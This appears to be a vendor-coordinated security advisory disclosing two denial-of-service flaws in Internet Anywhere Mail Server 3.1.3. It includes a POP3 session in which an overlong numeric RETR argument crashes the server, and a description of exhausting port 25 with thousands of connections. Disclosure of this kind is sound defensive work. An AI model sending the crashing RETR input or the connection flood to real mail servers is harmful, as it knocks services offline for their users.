Anywhere Mail Server Ver.3.1.3 for Windows contains a remote DoS vulnerability, via a long RETR string over port 110. Also multiple connections will kill the sendmail server.
898ce037d5ae22060272023db6f516430cb43637744b94e23045e20f85dc5447
Hello,
I've reported DoS probrems on Internet Anywhere Mail Server Ver.3.1.3
to support@tnsoft.com on 3rd Dec,99. They started to develop the fix.
But they said "we'll release the fix in couple of weeks" three times.
I've discussed with Jeff Moll(President of True North Software, Inc.)
and he allowed me to post these vulnerabilities.
1. RETR DoS in POP service
+OK POP3 Welcome to somewhere.domain using the Internet Anywhere
Mail Server Version: 3.1.3. Build: 1065 by True North Software,
Inc.
USER yellow
+OK valid
PASS pikapika
+OK Authorized
RETR 111111111111111111111111
That's all. The Server could be dead at a little bit after
atoi(). They should check return value of atoi().
2. multiple connections to port 25 DoS
This is simple game, too.
Too much connect()s about 3000, then you will see connection
refused. After that, too much connect()s again about 800, then
you can't connect anymore.
It depends on memory size(I tested on 128MB RAM,total 256MB).
They should check connection status.
Moderator of BUGTRAQ-JP
<Nobuo Miwa> n-miwa@lac.co.jp ( @ @ ) http://www.lac.co.jp/security/
-------------------------------o00o--(. .)--o00o-------------------------